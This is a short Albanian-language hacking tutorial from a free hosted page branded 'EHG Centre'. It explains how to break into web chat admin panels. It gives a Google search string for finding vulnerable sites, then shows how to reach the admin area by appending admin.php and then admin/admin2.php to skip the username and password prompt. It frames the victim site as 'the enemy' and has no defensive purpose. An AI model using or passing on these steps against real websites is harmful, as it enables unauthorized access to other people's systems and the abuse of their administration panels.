Mire Se Vini
  Si Te Hackojm WEb Chat
 
Se Pari kErkojm ne google kshtu : "webchat/login.php?rid=1"

pastaj e zgjedhi armikun qe dojm me hack . si p.sh :

http://www.emriiwebit.com/webchat/

pasi qe e gjejm mbrapa ja shtojm admin.php edhe bohet :

http://www.emriiwebit.com/webchat/admin.php

edhe pasi qe hyjm ne admin.php lyp username dhe password , ne ja shtojm ket:
/admin2.php/

edhe bohet kshtu :

http://www.emriiwebit.com/webchat/admin/admin2.php

kshtu qe kemi hyr ne admin panel .EHG Centre
 
  Today, there have been 2 visitors (35 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free